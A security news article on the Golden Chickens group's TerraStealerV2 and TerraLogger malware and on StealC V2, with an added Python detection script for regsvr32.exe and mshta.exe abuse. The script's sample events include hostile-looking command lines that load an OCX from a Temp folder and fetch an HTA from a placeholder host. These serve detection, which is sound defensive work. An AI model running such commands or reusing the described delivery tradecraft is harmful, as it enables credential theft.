
The threat actor known as Golden Chickens has been attributed two new malware families, TerraStealerV2 and TerraLogger, suggesting ongoing development efforts to refine and diversify its arsenal.
“TerraStealerV2 is designed to collect browser credentials, cryptocurrency wallet data, and browser extension information,” Recorded Future’s Insikt Group said. “In contrast, TerraLogger is a standalone keylogger. It uses a typical low-level keyboard hook to record keystrokes and writes the logs to a local file.”
Golden Chickens, also known as Venom Spider, is the name given to a financially motivated threat actor linked to the notorious malware family called More_eggs. It has been known to be active since at least 2018 and offers its wares under the malware-as-a-service (MaaS) model.
As of 2023, Golden Chickens was attributed to an online persona known as badbullzvenom, which is believed to be jointly run by Canadian and Romanian individuals. Other malicious tools developed by the e-crime group include More_eggs Lite (aka lite_more_eggs), VenomLNK, TerraLoader, and TerraCrypt.

Late last year, Zscaler ThreatLabz detailed new Golden Chickens-related activity, including a backdoor called RevC2 and a loader called Venom Loader, both of which were delivered via VenomLNK.
Recorded Future’s latest findings show that the threat actor continues to tinker with its products and is releasing updated versions of stealer malware that can harvest data from browsers, cryptocurrency wallets, and browser extensions.
TerraStealerV2 is distributed in a variety of formats, including executables (EXE), dynamic-link libraries (DLL), Windows Installer packages (MSI), and shortcut (LNK) files.
In all of these cases, the stealer payload is delivered as an OCX file (short for Microsoft’s OLE Control Extension) obtained from the external domain wetransfers[.]io.
“It targets the Chrome ‘Login Data’ database to steal credentials but does not bypass the Application Bound Encryption (ABE) protections introduced in Chrome updates since July 2024, indicating that the malware code is either outdated or still under development,” the cybersecurity company said.

Data captured by TerraStealerV2 is exfiltrated to both Telegram and the domain wetransfers[.]io. The malware also uses trusted Windows utilities such as regsvr32.exe and mshta.exe to evade detection.
TerraLogger, also propagated as an OCX file, is designed to record keystrokes. However, it includes no data exfiltration or command-and-control (C2) communication capabilities, suggesting that it is either in early development or intended to be used in conjunction with another component of the Golden Chickens MaaS ecosystem.
“The current state of TerraStealerV2 and TerraLogger suggests that both tools remain under active development and do not yet exhibit the level of stealth normally associated with mature Golden Chickens tooling,” Recorded Future said.
“Given the history of Golden Chickens developing malware for credential and access operations, these features could continue to evolve.”
The disclosure comes amid the emergence of new stealer malware families such as Hannibal Stealer, Gremlin Stealer, and Nullpoint Stealer.
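The regsvr32.exe and mshta.exe abuse described above is visible in process-creation telemetry, and that is where most defenders would catch it. The following Python is an added example, not code from Recorded Future, Zscaler, or the reporting above: it scans constructed Sysmon-style Event ID 1 records (fields `Image`, `CommandLine`, `EventId`) and flags regsvr32.exe registering an OCX/DLL from outside trusted install directories or with a URL argument, and mshta.exe launched with a remote or inline script or from a user-writable path. The sample events and the `placeholder.invalid` host are constructed; the trusted-directory list is an assumption to tune for your environment.

```python
"""Flag suspicious regsvr32.exe / mshta.exe process creations.

Added example for the article above; not vendor code. Events are
constructed samples shaped like Sysmon Event ID 1 exports.
"""
import re
from dataclasses import dataclass

# Assumption: modules legitimately registered by regsvr32 live under
# these roots. Tune per environment.
SYSTEM_DIRS = (r"c:\windows\system32", r"c:\windows\syswow64", r"c:\program files")
USER_WRITABLE_HINTS = ("\\temp\\", "\\appdata\\", "\\downloads\\", "\\public\\")
MODULE_RE = re.compile(r'("[^"]+\.(?:ocx|dll)"|\S+\.(?:ocx|dll))', re.I)


@dataclass
class Finding:
    event_id: int
    rule: str
    detail: str


def _path_is_trusted(path: str) -> bool:
    """True if the module path sits under one of the trusted roots."""
    return path.strip('"').lower().startswith(SYSTEM_DIRS)


def check_event(event: dict) -> list[Finding]:
    """Return zero or more findings for one process-creation event."""
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    cmd_l = cmd.lower()
    findings: list[Finding] = []

    if image.endswith("\\regsvr32.exe"):
        # regsvr32 can pull a scriptlet from a remote host via /i:<url>.
        if re.search(r"https?://", cmd_l):
            findings.append(Finding(event["EventId"], "regsvr32_remote", cmd))
        # An OCX/DLL registered from a user-writable location is the
        # pattern a dropped stealer payload would produce.
        for m in MODULE_RE.finditer(cmd):
            if not _path_is_trusted(m.group(1)):
                findings.append(Finding(event["EventId"],
                                        "regsvr32_untrusted_module", m.group(1)))
    elif image.endswith("\\mshta.exe"):
        if re.search(r"https?://|javascript:|vbscript:", cmd_l):
            findings.append(Finding(event["EventId"], "mshta_remote", cmd))
        elif any(h in cmd_l for h in USER_WRITABLE_HINTS):
            findings.append(Finding(event["EventId"], "mshta_user_writable_path", cmd))
    return findings


def scan(events: list[dict]) -> list[Finding]:
    """Run check_event over a batch of events and collect all findings."""
    out: list[Finding] = []
    for ev in events:
        out.extend(check_event(ev))
    return out


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Users\bob\AppData\Local\Temp\update.ocx"},
    {"EventId": 2, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32.exe /s "C:\Program Files\Vendor\control.ocx"'},
    {"EventId": 3, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r"regsvr32.exe /s C:\Windows\System32\msxml6.dll"},
    {"EventId": 4, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://placeholder.invalid/launch.hta"},
    {"EventId": 5, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta.exe C:\Users\bob\Downloads\invoice.hta"},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
```

Events 2 and 3 stay quiet because vendor and system modules are routinely registered this way; the signal is the untrusted source path or the remote/inline script, which is exactly what a delivery chain that drops an OCX and calls regsvr32 on it cannot avoid.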

It also follows the discovery of an updated version of the StealC malware that adds streamlined command-and-control (C2) communication protocols and RC4 encryption.
“The malware’s payload delivery options have been expanded to include Microsoft Software Installer (MSI) packages and PowerShell scripts,” Zscaler ThreatLabz said in a report published last week.

“The redesigned control panel provides an integrated builder that allows threat actors to customize payload delivery rules based on geolocation, hardware ID (HWID), and installed software. Additional features include multi-monitor screenshot capture, a unified file grabber, and server-side brute-forcing.”
The new version, 2.2.4 (aka StealC V2), introduced in March 2025, has been observed being distributed via another malware loader called Amadey. The control panel also supports Telegram bot integration for sending notifications, with customizable message formats.
“StealC V2 introduces improvements such as enhanced payload delivery, streamlined communication protocols with encryption, and a redesigned control panel that provides more targeted information collection,” Zscaler said.